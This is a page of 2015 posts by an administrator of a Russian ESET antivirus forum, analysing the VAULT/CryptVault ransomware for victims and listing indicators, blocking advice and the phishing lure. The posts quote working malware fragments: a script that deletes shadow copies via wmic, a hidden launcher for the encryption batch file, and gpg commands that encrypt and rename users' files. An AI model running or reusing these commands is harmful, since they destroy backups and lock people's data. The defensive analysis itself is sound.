Дорогие участники форума!

Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше.

На данный момент приобретение лицензий ESET через наш сайт недоступно.
В качестве альтернативы предлагаем антивирусные решения PRO32 — надёжную защиту от киберугроз и высокую производительность для устройств на Windows и Android.

Приглашаем вас присоединиться к новому форуму PRO32.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Добавьте лицензию в корзину и примените промокод при оформлении заказа.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи santy
Выбрать дату в календареВыбрать дату в календаре

Пред. 1 ... 493 494 495 496 497 498 499 500 501 502 503 ... 1784 След.
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 20:59:59
Цитата
valeg odminchik написал:
Вот закрытый ключ(export)(может кому еще поможет)
в том и "прелесть" PGP, что ключ уникален, и полезен в расшифровке лишь в одном случае и одному пользователю.
остальным полезен, разве что взглянуть на него, как он выглядит по своему содержанию.
[ Как создать образ автозапуска? ]
Перейти
поговорить о uVS, Carberp, планете Земля
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:27:46
угу, вчера засветился


[email protected] 1.2.0.0.id-JKKLMNOOOPPQRRSTTTUVVWXXXYZZABBBCDDE-25.10.2015 20@[email protected]
Изменено: santy - 28.10.2015 15:29:17
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:17:02
вот этот скриптик надо удалять
Цитата
echo var cdp="%%TEMP%%\\a01dc229.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}>> "%temp%\7c62070c.js"
тот что выше, похоже, используют как обманку для антивируса. два однотипных скрипта, но только один из них запускает процесс шифрования.
а на него как раз - ноль реакции, хотя именно он содержит ссылку на командный файл a01dc229.cmd, в котором собраны все команды шифрования файлов. после обхода дисков и очистки от лишних строк.

вот с этим содержимым и надо ловить файл, здесь инфы предостаточно, чтобы отловить его.
Цитата
chcp 866
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& move /y "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls.gpg" "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls"& rename "C:\файлы для тестирования шифровальщиков\15092014 16_55_03.xls" "15092014 16_55_03.xls.vault"
"%TeMp%\d4a76286.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& move /y "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls.gpg" "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls"& rename "C:\файлы для тестирования шифровальщиков\32 ремонтный завод .xls" "32 ремонтный завод .xls.vault"
Изменено: santy - 04.06.2016 18:08:54
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 15:10:09
27.10.2015 11:15:29 Защита в режиме реального времени файл C:\Users\23\AppData\Local\Temp\27ddf88e.js BAT/Filecoder.AG троянская программа очищен удалением - изолирован 23-ПК\23 Событие произошло в новом файле, созданном следующим приложением: C:\Windows\System32\cmd.exe.

Цитата
echo var cdp="%%TEMP%%\\05542988.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\27ddf88e.js"

этот скриптик, скорее всего уже после запуска был удален. здесь удаление файла не повлияло на процесс шифрования.
Изменено: santy - 04.06.2016 18:08:54
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы с расширением .vault, bat encoder /CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 14:50:33
Станислав,
если не трудно, добавьте лог журнала обнаружения угроз.
судя по рисунку, ESET прибил скриптик vbs, который удаляет теневые копии, возможно до его запуска, потому теневые копии сохранились

судя по коду шифратора так и есть.
Код
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"
Изменено: santy - 04.06.2016 18:07:56
[ Как создать образ автозапуска? ]
Перейти
Подозрение AVZ на Rootkit в антивирусе и браузере.
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 04:43:35
добавьте новый образ, из безопасного режима системы
[ Как создать образ автозапуска? ]
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 28.10.2015 04:41:59
Сергей,
Цитата
Sergey Lobashev написал:
Нашёл 43487a9e.ca8469cb, но там ))) :
43487a9e.ca8469cb - здесь это другой файл, содержит отчет о найденных на диске паролях

                                **********************************************
                                         Browser Password Recovery Report
                               **********************************************

созданный этой утилитой
____________________________________________________________­__________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com

ключ же экспортируется сюда, до момента его шифрования
e6335bfe.7c8f89eb

без ключа, который был создан в secring.gpg
или без экспортированного из secring.gpg в файл e6335bfe.7c8f89eb
расшифровка невозможна.
Изменено: santy - 28.10.2015 04:42:21
[ Как создать образ автозапуска? ]
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 27.10.2015 14:50:28
установил виртуалку, попробую найти "10 отличий" от тех вариантов что были в августе

по ВАУЛТ изменений нет. расшифровка возможна только при наличие живого secring.gpg
времени достаточно - 2года активности (данного шифратора), чтобы понять, что расшифровку ждать бессмысленно, необходимо принимать жесточайшие меры по предотвращению подобных запусков с помощью политик, или использовать нестандартные решения.
-------
1. для предотвращения запуска шифратора блокируем адрес
*revault.me*
2. для шифрования secring.gpg юзера используется новый ключ мошенников:
VaultCrypt
0x35E2868D
от 23 октября 2015 г
3.для восстановления secring.gpg ищем среди удаленных файл:
e6335bfe.7c8f89eb
4. утилита gpg.exe переименована в d4a76286.exe
gpg (GnuPG) 1.4.18
Copyright © 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: C:/Users/***/AppData/Roaming/gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH,
       CAMELLIA128, CAMELLIA192, CAMELLIA256
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2
5. тело бат-шифратора:
vb17330200.bat

6. текст сообщения
Цитата
Тема: Акт Сверки - октябрть

Добрый час, Мы со своей стороны понимаем, что в стране кризис, но все же мое руководство распорядилoсь подписать с Вами Акт сверки (см. приложение к письму) и отобразить имеющийся долг. Будьте добры проверить приложенный документ и сориентировать по срокам оплаты.

7. имя исполняемого js из вложения
Акт_сверки_27 октября 2015 года_задолженность по счетам за прошлые периоды_бухгалтерия - согласовано_аудит - ПОДПИСАНО_f41f9a6ff9d.dосх .js
эта часть может меняться
f41f9a6ff9d
и
Акт сверки от 27 октября 2015г. Задолженность по счетам за прошлые периоды. Согласовано бухгалтерией. Подписано директором_ 17525167491.рdf .js
Изменено: santy - 27.10.2015 17:55:14
[ Как создать образ автозапуска? ]
Перейти
[ Закрыто] VAULT. что делать?, bat encoder / CryptVault
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 27.10.2015 13:19:49
судя по сообщениям, ВАУЛТ вновь активен.
https://www.virustotal.com/ru/file/d84c4e2edfb1762defec41258df3a6abe1bb6295d530de96­9e891a45e35d8efb/analysis/1445941012/
второй вариант
https://www.virustotal.com/ru/file/17b4e407f4acd65ef6558c1a4763552ae249882b523932ba­dc6eb4b99ad77304/analysis/1445946550/
Изменено: santy - 27.10.2015 14:54:04
[ Как создать образ автозапуска? ]
Перейти
файлы зашифрованы в Cryakl CL 0.1.*.*-1.3.*.*, Filecoder.EQ/Encoder.567/Cryakl
 
santy
santy
Администратор
Сообщений: 17977
Баллов: 28762
Регистрация: 16.03.2010
Размещено 27.10.2015 12:26:18
Андрей,
восстановление документов реально, но при определенных условиях.
прочтите здесь по методам восстановление документов после шифрования.
http://forum.esetnod32.ru/forum35/topic11575/
возможно, какой-то из данных методов поможет вам.
Изменено: santy - 22.02.2020 16:26:53
[ Как создать образ автозапуска? ]
Перейти
Пред. 1 ... 493 494 495 496 497 498 499 500 501 502 503 ... 1784 След.